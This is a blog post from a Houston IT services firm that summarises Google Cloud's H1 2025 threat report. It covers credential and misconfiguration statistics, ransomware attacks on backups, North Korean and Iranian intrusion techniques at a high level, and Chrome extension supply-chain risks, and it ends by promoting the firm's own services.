This finding won't surprise anyone who's been paying attention, but the numbers drive the point home. During the first half of 2025, Google Cloud tracked the primary ways attackers got into cloud environments. The results are pretty damning for organizations that haven't locked down their identity and access controls.

A new wrinkle this cycle: leaked credentials found on dark web sources now account for 2.9% of initial access. That might sound small, but it represents a shift. Attackers are actively mining credential dumps and breach databases for cloud access keys, then using them before anyone notices. Google Cloud has started integrating with partners to automatically detect and disable leaked keys, but if you're not monitoring for this, you're exposed.

• Weak or missing credentials caused nearly half (47.1%) of all cloud security incidents tracked by Google in H1 2025
• Misconfigurations dropped 4.9% compared to H2 2024, but still represent 29.4% of entry points
• Leaked credentials from dark web sources are a growing vector at 2.9% of initial access
• Remote code execution stayed consistent at 2.9%, reinforcing the need for timely patching
• Google's vulnerability research team discovered critical Rsync flaws in Q4 2024 that could have enabled supply chain compromises through RCE

The pattern here hasn't changed in years. Businesses that nail the basics - strong credential policies, least-privilege access, and consistent patch management - block the vast majority of cloud attacks. We see this play out with Houston-area clients all the time. The ones who take identity management seriously almost never show up in our incident logs.

This is probably the most alarming finding in the report for small and mid-sized businesses. Ransomware crews have figured out that the fastest path to a payday isn't just encrypting files - it's making sure you can't recover them. Multiple threat groups are now specifically hunting for backup systems as a primary objective, not an afterthought.

Google and Mandiant documented three named groups actively targeting backup infrastructure:

• UNC2165 (associated with RANSOMHUB) accessed cloud-based data backups, deleted backup routines and existing data, and modified user permissions to block recovery
• UNC4393 (previously linked to BASTA ransomware) targeted backup platforms directly
• UNC2465 (connected to DARKSIDE and LOCKBIT ransomware families) also focused on backup destruction

The Mandiant consulting team's incident response work revealed a consistent pattern of recovery failures. Backup data gets wiped or encrypted. Production systems sit offline during forensic investigation. Recovery plans stored on the same production environment become inaccessible. And most businesses don't have clearly defined Recovery Time Objectives (RTOs) or Recovery Point Objectives (RPOs) to guide the process.

Even worse, ransomware often takes out the infrastructure dependencies needed to access backups in the first place - Active Directory, DNS, DHCP, and virtualization platforms all have to come back online before backup orchestration tools can even function.

Google Threat Intelligence Group tracks UNC4899, a North Korean threat group aligned with the Reconnaissance General Bureau (the same group publicly known as TraderTraitor). They've been active since at least 2020, primarily targeting cryptocurrency and blockchain companies. Between Q3 2024 and Q1 2025, Mandiant responded to two separate incidents attributed to this group - one affecting Google Cloud, the other affecting AWS.

Both attacks started the same way: social engineering over social media. The attackers contacted employees via LinkedIn and Telegram, posing as freelance recruiters with software development opportunities. They convinced the targets to download and run malicious Docker containers on their workstations. From there, backdoors like GLASSCANNON, PLOTTWIST, and MAZEWIRE established command-and-control connections.

• In the Google Cloud attack, UNC4899 stole credentials and used Google Cloud CLI over anonymous VPN. When MFA blocked their progress, they used the victim's admin privileges to temporarily disable MFA, completed the theft, then re-enabled MFA to hide their tracks
• In the AWS attack, IAM policies required temporary credentials and MFA for sensitive operations. The attackers couldn't bypass this, so they exfiltrated session cookies instead and used them to upload malicious JavaScript files that manipulated cryptocurrency transactions
• Both incidents resulted in several million dollars in cryptocurrency theft

Two things stand out here. First, MFA actually worked in slowing the attackers down - it bought time and forced them to get creative. Second, the human element was the weakest link in both cases. An employee trusted a stranger on LinkedIn, ran untrusted code, and that was enough to open the door to a multi-million dollar loss.

For Houston businesses, the takeaway isn't about cryptocurrency. It's about how social engineering combined with cloud credential theft can devastate any organization. Energy services companies, law firms, CPA practices - any business where an employee might respond to a LinkedIn message from a "recruiter" is at risk.

This tactic is sneaky because it exploits the trust people have in platforms they use every day. Attackers host a normal-looking PDF on Google Drive, SharePoint, Dropbox, or GitHub. When a victim clicks the link, they see a legitimate document - an invoice, a report, an official-looking government notice. Meanwhile, malicious code runs silently in the background, downloading additional payloads, establishing persistence, and beginning data collection.

Google's intelligence teams documented both nation-state APT groups and financially motivated criminals using this approach. The technique works because:

• Links to well-known cloud storage domains don't trigger the same suspicion as unfamiliar websites
• Traditional security tools like basic firewalls and email gateways often don't flag downloads from trusted domains
• The decoy document keeps the victim distracted while the actual attack happens silently
• It's cheap and easy for attackers to create accounts on cloud storage platforms, sometimes using stolen credentials

The report also documented a newer variant targeting Linux systems, where .desktop files (application shortcuts in Unix environments) serve as first-stage droppers. These files download secondary payloads from attacker-controlled infrastructure while simultaneously displaying a decoy PDF from cloud storage to keep the victim unsuspecting.

Iranian APT group APT42 combined this technique with spear-phishing emails that spoofed journalists, event organizers, and high-ranking officials - using typosquatting domains to make the impersonation more believable. The layering of social engineering with trusted cloud infrastructure makes these attacks particularly hard to spot.

The final major finding focuses on Chrome Web Store extensions - but the principles apply broadly to any software supply chain that relies on developer account security. When an attacker compromises a Chrome extension developer's account, they can push a malicious update to every user who has that extension installed. The attack surface multiplied in late 2024 when a wave of OAuth phishing attacks targeted CWS developers specifically.

Here's how the attack works. The Chrome Web Store signs extensions with two keys: a Google key confirming CWS processed it, and a developer key. Most developers let Google manage the developer key rather than risk handling it themselves. That shifted the security boundary entirely to developer account authentication. If an attacker phishes the developer's OAuth credentials, they get full upload access.

• CWS now requires MFA and frequent re-authentication for developer dashboard access
• OAuth API tokens (used for automated builds) don't have the same MFA protections
• Attackers trick developers into granting OAuth permissions to malicious projects, which then push poisoned updates
• Google launched "Verified CRX Upload" in May 2025, adding a second factor (a private signing key) to the upload process
• Even if an attacker steals credentials and OAuth tokens, they can't push updates without the developer's private signing key

For businesses in Katy, Sugar Land, and the broader Houston area, this matters because browser extensions have access to everything employees do in the browser. A compromised extension could intercept credentials, redirect financial transactions, or exfiltrate sensitive data - and users would have no idea. Endpoint security and browser management policies should be part of every IT support conversation.

The Google Cloud Threat Horizons report reads like a checklist of the services we provide to businesses across Houston, Katy, Sugar Land, and the surrounding areas. Here's how CinchOps directly addresses each of these threats:

• Identity and access management - We enforce MFA across all accounts, implement least-privilege access policies, monitor for credential leaks on dark web sources, and run regular access audits to close permission gaps before attackers find them
• Backup and disaster recovery architecture - Our business continuity and disaster recovery services include isolated backup systems, immutable storage configurations, defined RTOs and RPOs, and regular recovery testing so you know your backups actually work when you need them
• Security awareness training - We train your employees to recognize social engineering attacks, including the LinkedIn and Telegram-based approaches documented in this report. Your team is always your first line of defense
• Endpoint detection and browser management - We manage browser extension policies, monitor for suspicious endpoint behavior, and maintain visibility across your entire environment so decoy file attacks and compromised extensions get caught early
• Patch management and vulnerability scanning - We keep systems patched on schedule, scan for misconfigurations, and monitor for the kind of RCE vulnerabilities that Google's own research team flagged as critical
• Cloud security posture management - Whether you're on Microsoft 365, Google Workspace, or AWS, we monitor configurations, enforce security policies, and make sure your cloud environment isn't one of the 29.4% with a misconfiguration waiting to be exploited

In 30 years of working in IT, the pattern hasn't changed. The businesses that invest in the fundamentals rarely end up in crisis. The ones who skip it pay much more later.